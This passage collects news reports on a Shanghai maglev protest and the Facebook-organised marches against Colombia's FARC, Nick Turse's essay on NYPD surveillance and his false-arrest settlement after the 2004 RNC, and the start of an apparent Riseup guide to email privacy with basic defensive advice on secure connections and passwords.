percent capacity; after ticket prices were lowered, it ran at 27
percent capacity.

Armed with knowledge of the law, the Shanghai residents became angry
that public officials had neither given proper notice of their plans
for the extension nor held a public hearing. And so they decided they
had no alternative but to “take a stroll” or “go shopping.” They
started small, and they were careful to say they did not oppose the

First, a small group of protesters met at a shopping center the
morning of Jan. 6, shouting “Reject the maglev!” and “We want to
protect our homes!” They left after an hour, regrouping later in a
neighborhood near where the extension would be built.

A few days later, hundreds of people went to a mall that is popular
with tourists and made an evening stop in another affected
neighborhood. By Jan. 12, thousands of people were gathering at
People’s Square and on Nanjing Lu, both high-profile locations in
downtown Shanghai, shouting “People’s police should protect the
people!” and “Save our homes!”

The growing boldness of the protesters has prompted city officials to
emphasize that residents should find “normal” channels to vent their
unhappiness. “We will forestall and defuse social tensions,” Shanghai
Mayor Han Zheng said in his annual government report Thursday, in what
appeared to be a tacit nod to the protesters’ concerns.

After each stroll, residents upload photos and videos to Chinese Web
sites, which are often blocked by the government, and to YouTube, a
site that isn’t. The project has turned neighbors who did not know
each other into close friends and allies who now compare notes and
strategize. “They can’t arrest everybody,” said Yao, a 58-year-old
protester who asked that his full name not be used because he is a
manager at a state-owned enterprise. “We haven’t done anything wrong,”
said Wang Guowei, 51, a manager in a Chinese-Japanese plastics venture
whose family lives near the planned extension. “We always follow the
Chinese constitution, we never violate the law. And in our many
contacts with the police, they say we are within the law.”

A victory for the protesters here does not seem as likely as the one
activists achieved in Xiamen. Proud city officials hope the maglev
extension will further cement Shanghai’s reputation as the mainland’s
most advanced city when the train connects the city’s two airports and
the site of the 2010 World Expo. City officials have already made some
concessions. An original plan to extend the train from Shanghai to the
city of Hangzhou, for example, was scrapped in May. The new extension
proposal announced Dec. 29 lops almost two miles off the old plan, and
one section of track would be underground. But opponents say such
concessions are small.

Critics of the government plan point out that even some residents who
use the train are skeptical of the usefulness of an extension. “I’d
rather see an ordinary railway connecting” Pudong international and
Hongqiao airport. “It’s cheap, and it’s almost the same convenience,”
said Chen Min, 37, an airline pilot who rides the train each time he
flies abroad. “Does China really need more maglev trains? Does China
really need expensive things?”

Shanghai municipal officials declined requests for comment. At a news
conference this week, government spokeswoman Jiao Yang said Shanghai
Maglev Transportation Development Co., the Shanghai Academy of
Environmental Science and the Municipal Urban Planning Administration
would analyze public opinion “seriously.”

Without the entire city united against the project, residents concede
they are not optimistic the extension will be scrapped. “But we must
insist on our position. We require our government to respect the law,
and public construction must follow a legal framework and the right
procedure,” said the 54-year-old businessman who asked another
protester for her photos. “Our action is a way to wake up people’s
awareness of their civil rights.”

Facebook used to target Colombia’s FARC with global rally

Internet site to spawn protests in 185 cities Monday against rebel
group’s methods
BY Sibylla Brodzinsky  /  February 4, 2008

Bogotá, Colombia – Hundreds of thousands of Colombians are expected to
march throughout the country and in major cities around the world
Monday to protest against this nation’s oldest and most powerful rebel

What began as a group of young people venting their rage at the
Revolutionary Armed Forces of Colombia (FARC) on Facebook, an Internet
social-networking site, has ballooned into an international event
called “One Million Voices Against FARC.”

“We expected the idea to resound with a lot of people but not so much
and not so quickly,” says Oscar Morales, who started the Facebook
group against the FARC, which now has 230,000 members. Organizers are
expecting marches in 185 cities around the world.

The event is another example of how technology – such as text
messaging on cellphones – can be used to rally large numbers of people
to a cause. Some observers say it’s less a response to the FARC’s
ideology than it is global public outrage over kidnapping as a weapon.

Colombia continues to be the world’s kidnapping capital with as many
as 3,000 hostages now being held. Anger over the practice has risen in
recent months after two women released by the FARC last month after
six years in captivity recounted the hardships they and other hostages

Monday’s protests have the support of the government, many
nongovernmental organizations, and some political parties but its main
battle cry of “No More FARC” has also polarized some Colombians rather
than bringing them together.

While few Colombians support the Marxist insurgent army that has been
fighting the Colombian state for more than 40 years, many people are
uncomfortable with the message of Monday’s rally. They would prefer a
broader slogan against kidnapping and in favor of peace and of
negotiations between the government and the rebels to exchange
hostages for jailed rebels. The leftist Polo Democratico Party said it
will hold a rally in Bogotá in favor of a negotiation but would not
march. Some senators say they will march against Venezuelan President
Hugo Chávez, and other participants say they will be marching in favor
of Colombian President Alvaro Uribe.

Consuelo González de Perdomo, one of the two women released by the
FARC on Jan. 10 said she would not be marching at all.

The families of the 45 remaining FARC hostages will not march either.
“The way the march was called aims to polarize the country,” says
Deyanira Ortiz, whose husband, Orlando Beltrán Cuéllar, has been held
by the FARC for six years. “It’s not for the freedom of the hostages
but against the FARC. And that doesn’t serve any purpose.”

Instead, the families and released FARC hostages will gather in
churches to pray for the release of their loved ones and for a
humanitarian agreement.

Rosa Cristina Parra, one of the original organizers of the march said
the position of the hostage families is “completely understandable”
and will not detract from the importance of the event. “We cannot
forget the other victims of the FARC, the land-mine victims, the
displaced people,” she says.



NYC, the NYPD, the RNC, and Me
Fortress Big Apple, 2007  /  BY Nick Turse

One day in August, I walked into the Daniel Patrick Moynihan
United States Courthouse in lower Manhattan. Nearly three years before
I had been locked up, about two blocks away, in “the Tombs” — the
infamous jail then named the Bernard B. Kerik Complex for the now-
disgraced New York City Police Commissioner. You see, I am one of the
demonstrators who was illegally arrested by the New York City Police
Department (NYPD) during the protests against the 2004 Republican
National Convention (RNC). My crime had been — in an effort to call
attention to the human toll of America’s wars — to ride the subway,
dressed in black with the pallor of death about me (thanks to
cornstarch and cold cream), and an expression to match, sporting a
placard around my neck that read: WAR DEAD.

I was with a small group and our plan was to travel from Union
Square to Harlem, change trains, and ride all the way back down to
Astor Place. But when my small group exited the train at the 125th
Street station in Harlem, we were arrested by a swarm of police,
marched to a waiting paddy wagon and driven to a filthy detention
center. There, we were locked away for hours in a series of razor-wire-
topped pens, before being bussed to the Tombs.

Now, I was back to resolve the matter of my illegal arrest. As I
walked through the metal detector of the Federal building, a security
official searched my bag. He didn’t like what he found. “You could be
shot for carrying that in here,” he told me. “You could be shot.”

For the moment, however, the identification of that dangerous
object I attempted to slip into the federal facility will have to
wait. Let me instead back up to July 2004, when, with the RNC fast-
approaching, I authored an article on the militarization of Manhattan
— “the transformation of the island into a ‘homeland-security state'”
— and followed it up that September with a street-level recap of the
convention protests, including news of the deployment of an
experimental sound weapon, the Long Range Acoustic Device, by the
NYPD, and the department’s use of an on-loan Fuji blimp as a “spy-in-
the-sky.” Back then, I suggested that the RNC gave New York’s
“finest,” a perfect opportunity to “refine, perfect, and implement new
tactics (someday, perhaps, to be known as the ‘New York model’) for
use penning in or squelching dissent. It offered them the chance to
write up a playbook on how citizens’ legal rights and civil liberties
may be abridged, constrained, and violated at their discretion.”
Little did I know how much worse it could get.

No Escape

Since then, the city’s security forces have eagerly embraced an
Escape From New York-aesthetic — an urge to turn Manhattan into a
walled-in fortress island under high-tech government surveillance,
guarded by heavily armed security forces, with helicopters perpetually
overhead. Beginning in Harlem in 2006, near the site of two new luxury
condos, the NYPD set up a moveable “two-story booth tower, called Sky
Watch,” that gave an “officer sitting inside a better vantage point
from which to monitor the area.” The Panopticon-like structure —
originally used by hunters to shoot quarry from overhead and now also
utilized by the Department of Homeland Security along the Mexican
border — was outfitted with black-tinted windows, a spotlight,
sensors, and four to five cameras. Now, five Sky Watch towers are in
service, rotating in and out of various neighborhoods.

With their 20-25 neighborhood-scanning cameras, the towers are
only a tiny fraction of the Big Apple surveillance story. Back in
1998, the New York Civil Liberties Union (NYCLU) found that there were
“2,397 cameras used by a wide variety of private businesses and
government agencies throughout Manhattan” — and that was just one
borough. About a year after the RNC, the group reported that a survey
of just a quarter of that borough yielded a count of more than 4,000
surveillance cameras of every kind. At about the same time, military-
corporate giant Lockheed Martin was awarded a $212 million contract to
build a “counter-terrorist surveillance and security system for New
York’s subways and commuter railroads as well as bridges and tunnels”
that would increase the camera total by more than 1,000. A year later,
as seems to regularly be the case with contracts involving the
military-corporate complex, that contract had already ballooned to
$280 million, although the system was not to be operational until at
least 2008.

In 2006, according to a Metropolitan Transit Authority (MTA)
spokesman, the MTA already had a “3,000-camera-strong surveillance
system,” while the NYPD was operating “an additional 3,000 cameras”
around the city. That same year, Bill Brown, a member of the
Surveillance Camera Players — a group that leads surveillance-camera
tours and maps their use around the city, estimated, according to a
Newsweek article, that the total number of surveillance cameras in New
York exceeded 15,000 — “a figure city officials say they have no way
to verify because they lack a system of registry.” Recently, Brown
told me that 15,000 was an estimate for the number of cameras in
Manhattan, alone. For the city as a whole, he suspects the count has
now reached about 40,000.

This July, NYPD officials announced plans to up the ante. By the
end of 2007, according to the New York Times, they pledged to install
“more than 100 cameras” to monitor “cars moving through Lower
Manhattan, the beginning phase of a London-style surveillance system
that would be the first in the United States.” This “Ring of Steel”
scheme, which has already received $10 million in funding from the
Department of Homeland Security (in addition to $15 million in city
funds), aims to exponentially decrease privacy because, if “fully
financed, it will include…. 3,000 public and private security
cameras below Canal Street, as well as a center staffed by the police
and private security officers” to monitor all those electronic eyes.

Spies in the Sky

At the time of the RNC, the NYPD was already mounted on police
horses, bicycles, and scooters, as well as an untold number of marked
and unmarked cars, vans, trucks, and armored vehicles, not to mention
various types of water-craft. In 2007, the two-wheeled Segway joined
its list of land vehicles.

Overhead, the NYPD aviation unit, utilizing seven helicopters,
proudly claims to be “in operation 24/7, 365,” according to Deputy
Inspector Joseph Gallucci, its commanding officer. Not only are all
the choppers outfitted with “state of the art cameras and heat-sensing
devices,” as well as “the latest mapping, tracking and surveillance
technology,” but one is a “$10 million ‘stealth bird,’ which has no
police markings — [so] that those on the ground have no idea they are
being watched.”

Asked about concerns over intrusive spying by members of the
aviation unit — characterized by Gallucci as “a bunch of big boys who
like big expensive toys” — Police Commissioner Raymond W. Kelly
scoffed. “We’re not able to, even if we wanted, to look into private
spaces,” he told the New York Times. “We’re looking at public areas.”
However, in 2005, it was revealed that, on the eve of the RNC
protests, members of the aviation unit took a break and used their
night-vision cameras to record “an intimate moment” shared by a
“couple on the terrace of a Second Avenue penthouse.”

Despite this incident, which only came to light because the same
tape included images that had to be turned over to a defendant in an
unrelated trial, Kelly has called for more aerial surveillance. The
commissioner apparently also got used to having the Fuji blimp at his
disposal, though he noted that “it’s not easy to send blimps into the
airspace over New York.” He then “challenged the aerospace industry to
find a solution” that would, no doubt, bring the city closer to life
under total surveillance.

Police Misconduct: The RNC

As a result of its long history of brutality, corruption, spying,
silencing dissent, and engaging in illegal activities, the NYPD is a
particularly secretive organization. As such, the full story of the
department’s misconduct during the Republican National Convention has
yet to be told; but, even in an era of heightened security and
defensiveness, what has emerged hasn’t been pretty.

By April 2005, New York Times journalist Jim Dwyer was already
reporting that, “of the 1,670 [RNC arrest] cases that have run their
full course, 91 percent ended with the charges dismissed or with a
verdict of not guilty after trial. Many were dropped without any
finding of wrongdoing, but also without any serious inquiry into the
circumstances of the arrests, with the Manhattan district attorney’s
office agreeing that the cases should be ‘adjourned in contemplation
of dismissal.'” In one case that went to trial, it was found that
video footage of an arrest had been doctored to bolster the NYPD’s
claims. (All charges were dropped against that defendant. In 400 other
RNC cases, by the spring of 2005, video recordings had either
demonstrated that defendants had not committed crimes or that charges
could not be proved against them.)

Since shifting to “zero-tolerance” law enforcement policies under
Mayor (now Republican presidential candidate) Rudolph Giuliani, the
city has been employing a system of policing where arrests are used to
punish people who have been convicted of no crime whatsoever,
including, as at the RNC or the city’s monthly Critical Mass bike
rides, those who engage in any form of protest. Prior to the Giuliani
era, about half of all those “arrested for low-level offenses would
get a desk-appearance ticket ordering them to go to court.” Now the
proportion is 10%. (NYPD documents show that the decision to arrest
protesters, not issue summonses, was part of the planning process
prior to the RNC.)

Speaking at the 2007 meeting of the American Sociological
Association, Michael P. Jacobson, Giuliani’s probation and correction
commissioner, outlined how the city’s policy of punishing the presumed
innocent works:

“Essentially, everyone who’s arrested in New York City, in the
parlance of city criminal justice lingo, goes through ‘the system’….
if you’ve never gone through the system, even 24 hours — that’s a
shocking period of punishment. It’s debasing, it’s difficult. You’re
probably in a fairly gross police lockup. You probably have no toilet
paper. You’re given a baloney sandwich, and the baloney is green.”

In 2005, the Times’ Dwyer revealed that at public gatherings since
the time of the RNC, police officers had not only “conducted covert
surveillance… of people protesting the Iraq war, bicycle riders taking
part in mass rallies and even mourners at a street vigil for a cyclist
killed in an accident,” but had acted as agent provocateurs. At the
RNC, there were multiple incidents in which undercover agents
influenced events or riled up crowds. In one case, a “sham arrest” of
“a man secretly working with the police led to a bruising
confrontation between officers in riot gear and bystanders.”

In 2006, the Civilian Complaint Review Board (CCRB), reported
“that hundreds of Convention protesters may have been unnecessarily
and unlawfully arrested because NYPD officials failed to give adequate
orders to disperse and failed to afford protesters a reasonable
opportunity to disperse.”

Police Commissioner Kelly had no hesitation about rejecting the
organization’s report. Still, these were strong words, considering the
weakness of the source. The overall impotence of the CCRB suggests a
great deal about the NYPD’s culture of unaccountability. According to
an ACLU report, the board “investigates fewer than half of all
complaints that it reviews, and it produces a finding on the merits in
only three of ten complaints disposed of in any given year.” This
inaction is no small thing, given the surge of complaints against NYPD
officers in recent years. In 2001, before Mayor Bloomberg and Police
Commissioner Kelly came to power, the CCRB received 4,251 complaints.
By 2006, the number of complaints had jumped by 80% to 7,669. Even
more telling are the type of allegations found to be on the rise (and
largely ignored). According to the ACLU, from 2005 to 2006, complaints
over the use of excessive force jumped 26.8% — “nearly double the
increase in complaints filed.”

It was in this context that the planning for the RNC
demonstrations took place. In 2006, in five internal police reports
made public as part of a lawsuit, “New York City police commanders
candidly discuss[ed] how they had successfully used ‘proactive
arrests,’ covert surveillance and psychological tactics at political
demonstrations in 2002, and recommend[ed] that those approaches be
employed at future gatherings.” A draft report from the department’s
Disorder Control Unit had a not-so-startling recommendation, given
what did happen at the RNC: “Utilize undercover officers to distribute
misinformation within the crowds.”

According to Dwyer, for at least a year prior to those
demonstrations, “teams of undercover New York City police officers
traveled to cities across the country, Canada and Europe” to conduct
covert surveillance of activists. “In hundreds of reports, stamped
‘N.Y.P.D. Secret,’ [the NYPD’s] Intelligence Division chronicled the
views and plans of people who had no apparent intention of breaking
the law, [including] street theater companies, church groups and
antiwar organizations, as well as environmentalists and people opposed
to the death penalty, globalization and other government policies.”
Three elected city councilmen — Charles Barron, Bill Perkins and
Larry B. Seabrook — were even cited in the reports for endorsing a
protest event held on January 15, 2004 in honor of Dr. Martin Luther
King Jr.’s birthday.

In August, the New York Times editorial page decried the city’s
continuing attempts to keep documents outlining the police
department’s spying and other covert activities secret:

“The city of New York is waging a losing and ill-conceived
battle for overzealous secrecy surrounding nearly 2,000 arrests during
the 2004 Republican National Convention…. Police Commissioner Ray
Kelly seemed to cast an awfully wide and indiscriminate net in seeking
out potential troublemakers. For more than a year before the
convention, members of a police spy unit headed by a former official
of the Central Intelligence Agency infiltrated a wide range of groups…
many of the targets … posed no danger or credible threat.”

The Times concluded that — coupled with Mayor Michael Bloomberg’s
efforts to disrupt and criminalize protest during the convention week
— “police action helped to all but eliminate dissent from New York
City during the Republican delegates’ visit. If that was the goal,
then mission accomplished. And civil rights denied.”

Police Commissioner Kelly had a radically different take on his
department’s conduct. Earlier this year, he claimed that “the
Republican National Convention was perhaps the finest hour in the
history of the New York City Department.”

Police Misconduct: 2007

“Finest” might seem a funny term for the NYPD’s actions, but these
days everyone’s a relativist. In the years since the RNC protests, the
NYPD has been mired in scandal after scandal — from killing unarmed
black men and “violations of civil rights” at the National Puerto
Rican Day Parade to issuing “sweeping generalizations” that lead to
“labeling almost every American Muslim as a potential terrorist.” And,
believe it or not, the racial and political scandals were but a modest
part of the mix. Add to them, killings, sexual assaults, kidnapping,
armed robbery, burglary, corruption, theft, drug-related offenses,
conspiracy — and that’s just a start when it comes to crimes members
of the force have been charged with. It’s a rap sheet fit for Public
Enemy #1, and we’re only talking about the story of the NYPD in the
not-yet-completed year of 2007.

For example, earlier this year a 13-year NYPD veteran was
“arrested on charges of hindering prosecution, tampering with
evidence, obstructing governmental administration and unlawful
possession of marijuana,” in connection with the shooting of another
officer. In an unrelated case, two other NYPD officers were arrested
and “charged with attempted kidnapping, armed robbery, armed burglary
and other offenses.”

In a third case, the New York Post reported that a “veteran NYPD
captain has been stripped of his badge and gun as part of a federal
corruption probe that already has led to the indictment of an Internal
Affairs sergeant who allegedly tipped other cops that they were being
investigated.” And that isn’t the only NYPD cover-up allegation to
surface of late. With cops interfering in investigations of fellow
cops and offering advice on how to deflect such probes, it’s a wonder
any type of wrongdoing surfaces. Yet, the level of misconduct in the
department appears to be sweeping enough to be irrepressible.

For instance, sex crime scandals have embroiled numerous officers
— including one “accused of sexually molesting his young
stepdaughter,” who pled guilty to “a misdemeanor charge of child
endangerment,” and another “at a Queens hospital charged with
possessing and sharing child pornography.” In a third case, a member
of the NYPD’s School Safety Division was “charged with the attempted
rape and sexual abuse of a 14-year-old girl.” In a fourth case, a
“police officer pleaded guilty…. to a grotesque romance with an
infatuated 13-year-old girl.” Meanwhile, an NYPD officer, who molested
women while on duty and in uniform, was convicted of sexual abuse and
official misconduct.

Cop-on-cop sexual misconduct of an extreme nature has also
surfaced…. but why go on? You get the idea. And, if you don’t, there
are lurid cases galore to check out, like the investigation into
“whether [an] NYPD officer who fatally shot his teen lover before
killing himself murdered the boyfriend of a past lover,” or the
officer who was “charged with intentional murder in the shooting death
of his 22-year-old girlfriend.” And don’t even get me started on the
officer “facing charges of conspiracy to distribute narcotics and
conspiracy to commit robberies of drugs and drug proceeds from
narcotics traffickers.”

All of this, and much more, has emerged in spite of the classic
blue-wall-of-silence. It makes you wonder: In the surveillance state
to come, are we going to be herded and observed by New York’s finest

It’s important to note that all of these cases have begun despite
a striking NYPD culture of non-accountability. Back in August, the New
York Times noted that the “Police Department has increasingly failed
to prosecute New York City police officers on charges of misconduct
when those cases have been substantiated by the independent board that
investigates allegations of police abuse, officials of the board say.”
Between March 1, 2007 and June 30, 2007 alone, the NYPD “declined to
seek internal departmental trials against 31 officers, most of whom
were facing charges of stopping people in the street without probable
cause or reasonable suspicion, according to the city’s Civilian
Complaint Review Board.” An ACLU report, “Mission Failure: Civilian
Review of Policing in New York City, 1994-2006,” released this month,
delved into the issue in even greater detail. The organization found
that, between 2000 and 2005, “the NYPD disposed of substantiated
complaints against 2,462 police officers: 725 received no discipline.
When discipline was imposed, it was little more than a slap on the

Much has come to light recently about the way the U.S. military
has been lowering its recruitment standards in order to meet the
demands of ongoing, increasingly unpopular wars in Iraq and
Afghanistan, including an increase in “moral waivers” allowing more
recruits with criminal records to enter the services. Well, it turns
out that, on such policies, the NYPD has been a pioneering

In 2002, the BBC reported that “New York’s powerful police union….
accused the police department of allowing ‘sub-standard’ recruits onto
the force.” Then, just months after the RNC protests, the New York
Daily News exposed the department’s practice of “hiring applicants
with arrest records and shoving others through without full background
checks” including those who had been “charged with laundering drug
money, assault, grand larceny and weapons possession.” According to
Sgt. Anthony Petroglia, who, until he retired in 2002, had worked for
almost a decade in the department’s applicant-processing division, the
NYPD was “hiring people to be cops who have no respect for the law.”
Another retiree from the same division was blunter: “It’s all judgment
calls — bad ones…. but the bosses say, ‘Send ’em through. We’ll
catch the problem ones later.'”

The future looks bright, if you are an advocate of sending the
force even further down this path. The new choice to mold the
department of tomorrow, according to the Village Voice, the “NYPD’s
new deputy commissioner of training, Wilbur ‘Bill’ Chapman, should
have no trouble teaching ‘New York’s Finest’ about the pitfalls of
sexual harassment, cronyism, and punitive transfers [because h]e’s
been accused of all that during his checkered career.”

In the eerie afterglow of 9/11, haunted by the specter of
terrorism, in an atmosphere where repressive zero-tolerance policies
already rule, given the unparalleled power of Commissioner Kelly —
called “the most powerful police commissioner in the city’s history”
by NYPD expert Leonard Levitt — and with a police department largely
unaccountable to anyone (as the only city agency without any effective
outside oversight), the Escape from New York model may indeed
represent Manhattan’s future.

Nick Turse v. The City of New York

So what, you might still be wondering, was it that led the
security official at the federal courthouse to raise the specter of my
imminent demise? A weapon? An unidentified powder? No, a digital audio
recorder. “Some people here don’t want to be recorded,” he explained
in response to my quizzical look.

So I checked the recording device and, accompanied by my lawyer,
the indomitable Mary D. Dorman, made my way to Courtroom 18D, a
stately room in the upper reaches of the building that houses the
oldest district court in the nation. There, I met our legal nemesis, a
city attorney whose official title is “assistant corporation counsel.”
After what might pass for a cordial greeting, he asked relatively
politely whether I was going to accept the city’s monetary offer of
$8,500 — which I had rejected the previous week– to settle my
lawsuit for false arrest. As soon as I indicated I wouldn’t (as I had
from the moment the city started the bidding at $2,500), any hint of
cordiality fled the room. Almost immediately, he was referring to me
as a “criminal” — declassified NYPD documents actually refer to me as
a “perp.” Soon, he launched into a bout of remarkable bluster,
threatening lengthy depositions to waste my time and monetary
penalties associated with court costs that would swallow my savings.

Then, we were all directed to a small jury room off the main
courtroom, where the city’s attorney hauled out a threatening prop to
bolster his act — an imposingly gigantic file folder stuffed with
reams of “Nick Turse” documents, including copies of some of my
disreputable Tomdispatch articles as well as printouts of suspicious
webpages from the American Empire Project — the obviously criminal
series that will be publishing my upcoming book, The Complex.

There, the litany of vague threats to tie me down with
depositions, tax me with fees, and maybe, somehow, send me to jail for
a “crime” that had been dismissed years earlier continued until a
federal magistrate judge entered the room. To him, the assistant
corporation counsel and I told our versions of my arrest story —
which turned out to vary little.

The basic details were the same. As the city attorney shifted in
his seat, I told the judge how, along with compatriots I’d met only
minutes before, I donned my “WAR DEAD” sign and descended into the
subway surrounded by a phalanx of cops — plainclothes, regular
uniformed, Big Brother-types from the Technical Assistance Response
Unit (TARU), and white-shirted brass, as well as a Washington Post
photographer and legal observers from the National Lawyers Guild —
and boarded our train. I explained that we sat there looking as dead
as possible for about 111 blocks and then, as the Washington Post
reported, were arrested when we came back to life and “tried to change
trains.” I asked, admittedly somewhat rhetorically why, if I was such
a “criminal,” none of the officers present at my arrest had actually
showed up in court to testify against me when my case was dismissed
out of hand back in 2004? And why hadn’t the prosecutor wanted to
produce the video footage the NYPD had taken of the entire action and
my arrest? And why had the city been trying to buy me off all these
years since?

Faced with the fact that his intimidation tactics hadn’t worked,
the city attorney now quit his bad-cop tactics and I rose again out of
the ditch of “common criminality” into citizenship and then to the
high status of being addressed as “Dr. Turse” (in a bow to my PhD).
Offers and counteroffers followed, leading finally to a monetary
settlement with a catch — I also wanted an apology. If that guard
hadn’t directed me — under threat of being shot — to check my
digital audio recorder at the door, I might have had a sound file of
it to listen to for years to come. Instead, I had to be content with
the knowledge that an appointed representative of the City of New York
not only had to ditch the Escape from New York model — at least for a
day — pony up some money for violating my civil rights, and, before a
federal magistrate judge, also issue me an apology, on behalf of the
city, for wrongs committed by the otherwise largely unaccountable

The Future of the NYPD and the Homeland-Security State-let

I’m under no illusions that this minor monetary settlement and
apology were of real significance in a city where civil rights are
routinely abridged, the police are a largely unaccountable armed
force, and a culture of total surveillance is increasingly the norm.
But my lawsuit, when combined with those of my fellow arrestees, could
perhaps have some small effect. After all, less than a year after the
convention, 569 people had already “filed notices that they intended
to sue the City, seeking damages totaling $859,014,421,” according to
an NYCLU report. While the city will end up paying out considerably
less, the grand total will not be insignificant. In fact, Jim Dwyer
recently reported that the first 35 of 605 RNC cases had been settled
for a total of $694,000.

If New Yorkers began to agitate for accountability — demanding,
for instance, that such settlements be paid out of the NYPD’s budget
— it could make a difference. Then, every time New Yorkers’ hard-
earned tax-dollars were handed over to fellow citizens who were
harassed, mistreated, injured, or abused by the city’s police force
that would mean less money available for the “big expensive toys” that
the “big boys” of the NYPD’s aviation unit use to record the private
moments of unsuspecting citizens or the ubiquitous surveillance gear
used not to capture the rest of the city on candid camera. It wouldn’t
put an end to the NYPD’s long-running criminality or the burgeoning
homeland security state-let that it’s building, but it would, at
least, introduce a tiny measure of accountability.

Such an effort might even begin a dialogue about the NYPD, its
dark history, its current mandate under the Global War on Terror, and
its role in New York City. For instance, people might begin to examine
the very nature of the department. They might conclude that questions
must be raised when institutions — be they rogue regimes, deleterious
industries, unaccountable corporations, or fundamentally-tainted
government institutions — consistently, over many decades, evidence a
persistent disregard for the law, a lack of accountability, and a deep
resistance to reform. Those directly affected by the NYPD, a nearly
38,000-person force — larger than many armies — that has
consistently flouted the law and has proven remarkably resistant to
curtailing its own misconduct for well over a century, might even
begin to wonder if it can be trusted to administer the homeland
security state-let its top officials are fast implementing and, if
not, what can be done about it.


Nick Turse is the associate editor and research director of He has written for the Los Angeles Times, the San
Francisco Chronicle, the Nation, the Village Voice, and regularly for His first book, The Complex, an exploration of the
new military-corporate complex in America, is due out in the American
Empire Project series by Metropolitan Books in 2008. His new website (up only in rudimentary form) will fully launch in the
coming months.

Why security matters

Every email takes a perilous journey. A typical email might travel
across twenty networks and be stored on five computers from the time
it is composed to the time it is read. At every step of the way, the
contents of the email might be monitored, archived, cataloged, and

However, it is not the content of your email which is most
interesting: typically, a spying organization is more concerned by
whom you communicate with. There are many ways in which this kind of
mapping of people’s associations and habits is far worse than
traditional eavesdropping. By cataloging our associations, a spying
organization has an intimate picture of how our social movements are
organized–a more detailed picture than even the social movements
themselves are aware of.

This is bad. Really bad. The US government, among others, has a long
track record of doing whatever it can to subvert, imprison, kill, or
squash social movements which it sees as a threat (black power, anti-
war, civil rights, anti-slavery, native rights, organized labor, and
so on). And now they have all the tools they need to do this with
blinding precision.

We believe that communication free of eavesdropping and association
mapping is necessary for a democratic society (should one ever happen
to take root in the US). We must defend the right to free speech, but
it is just as necessary to defend the right to private speech.

Unfortunately, private communication is not possible if only a few
people practice it: they will stand out and open themselves up to
greater scrutiny. Therefore, we believe it is important for everyone
to incorporate as many security measures in your email life as you are

Email is not secure

You should think of normal email as a postcard: anyone can read it,
your letter carrier, your nosy neighbor, your house mates. All email,
unless encrypted, is completely insecure. Email is actually much less
secure than a postcard, because at least with a postcard you have a
chance of recognizing the sender’s handwriting. With email, anyone can
pretend to be anyone else.

There is another way in which email is even less private than a
postcard: the government does not have enough labor to read everyone’s
postscards, but they probably have the capacity and ability to scan
most email. Based on current research in datamining, it is likely that
the government does not search email for particular words but rather
looks for patterns of association and activity.

In the three cases below, evidence is well established that the
government conducts widespread and sweeping electronic survillence.

full-pipe monitoring
According to a former Justice Department attorney, it is common
practice for the FBI to practice “full-pipe monitoring”. The process
involves vacuuming up all traffic of an ISP and then later mining that
data for whatever the FBI might find interesting. The story was first
reported on January 30, 2007 by Declan McCullagh of CNET

The Electronic Frontier Foundation (EFF) filed a class-action
lawsuit against AT&T on January 31, 2006, accusing the telecom giant
of violating the law and the privacy of its customers by collaborating
with the National Security Agency (NSA) in its massive and illegal
program to wiretap and data-mine Americans’ communications.

Because AT&T is one of the few providers of the internet backbone
(a so called Tier 1 provider), even if you are not an AT&T customer is
is likely that AT&T is the carrier for much of your interent traffic.
It is very likely that other large internet and email providers have
also worked out deals with the government. We only know about this one
because of an internal whistleblower.

For legal domestic wiretaps, the U.S. government runs a program
called Carnivore (also called DCS1000).

Carnivore is a ‘black box’ which some ISPs are required to install
which allows law enforcement to do ‘legal’ wiretaps. However, no one
knows how they work, they effectively give the government total
control over monitoring anything on the ISP’s network, and there is
much evidence that the government uses carnivore to gather more
information than is legal.

As of January 2005, the FBI announced they are no longer using
Carnivore/DCS1000 and are replacing it with a product developed by a
third party. The purpose of the new system is exactly the same.

ECHELON is a spy program operated cooperatively with the
governments of the United States, Canada, United Kingdom, Australia,
and New Zealand. The goal is to monitor and analyze internet traffic
on a wide scale. The EU Parliament has accused the U.S. of using
Echelon for industrial espionage.

Call database

On May 10, USAToday broke the story that the NSA has a database
designed to track every phone call ever made in the US. Although this
applies to phone conversations, the fact that the government believes
that this is legal means that they almost certainly think it is legal
to track all the email communication within the US as well. And we
know from the AT&T case that they have the capability to do so.

You can do something about it!

What a gloomy picture! Happily, there are many things you can do.
These security pages will help outline some of the simple and not-so-
simple changes you can make to your email behavior.

* Secure Connections: by using secure connections, you protect
your login information and your data while is in transport to
* Secure Providers: when you send mail to and from secure email
providers, you can protect the content of your communication and also
the pattern of your associations.
* Public Key Encryption: although it is a little more work, public
key encryption is the best way to keep the content of your
communication private.

See the next page, Security Measures, for tips on these and other
steps you can take. Remember: even if you don’t personally need
privacy, practicing secure communication will ensure that others have
the ability to freely organize and agitate.

Practice secure behavior!
These pages include a lot of fancy talk about encryption. Ultimately,
however, all this wizbang cryto-alchemy will be totally useless if you
have insecure behavior. A few simple practices will go a long way
toward securing your communications:

1. Logout: make sure that you always logout when using web-mail.
This is very important, and very easy to do. This is particular
important when using a public computer.
2. Avoid public computers: this can be difficult. If you do use a
public computer, consider changing your password often or using the
virtual keyboard link (if you use for your web-mail).
3. Use good password practice: you should change your password
periodically and use a password which is at least 6 characters and
contains a combination of numbers, letters, and symbols. It is better
to use a complicated password and write it down then to use a simple
password and keep it only in your memory. Studies show that most
people use passwords which are easy to guess or to crack, especially
if you have some information about the interests of the person. You
should never pick a password which is found in the dictionary (the
same goes for “love” as well as “10v3” and other common ways of
replacing letters with numbers).
4. Be a privacy freak: don’t tell other people your password. Also,
newer operating systems allow you to create multiple logins which keep
user settings separate. You should enable this feature, and logout or
“lock” the computer when not in use.

Use secure connections!
What are secure connections?

When you check your mail from the server, you can use an
encrypted connection, which adds a high level of security to all
traffic between your computer and Secure connections are
enabled for web-mail and for IMAP or POP mail clients.

This method is useful for protecting your password and login. If you
don’t use a secure connection, then your login and password are sent
over the internet in a ‘cleartext’ form which can be easily
intercepted. It is obvious why you might not want your password made
public, but it may also be important to keep your login private in
cases where you do not want your real identity tied to a particular
email account.

How do I know if I am using a secure connection?

When using web browser (Firefox, Safari, etc.)
If you are using a web browser to connect to Riseup, you can look at
three things to check to see if you are using a secure connection.

The first is easy, are you using Internet Explorer? If so, switch to
Firefox. The security problems with Internet Explorer are too numerous
to mention and making the switch to Firefox is an easy step in the
right direction.

Secondly, look up at the URL bar, where the address is. If it starts
with “https://” (NOTE the ‘s’), then you have a secure connection, if
its just “http://” (NO ‘s’), then you are not using a secure
connection. You can change that “http” to “https” by clicking on the
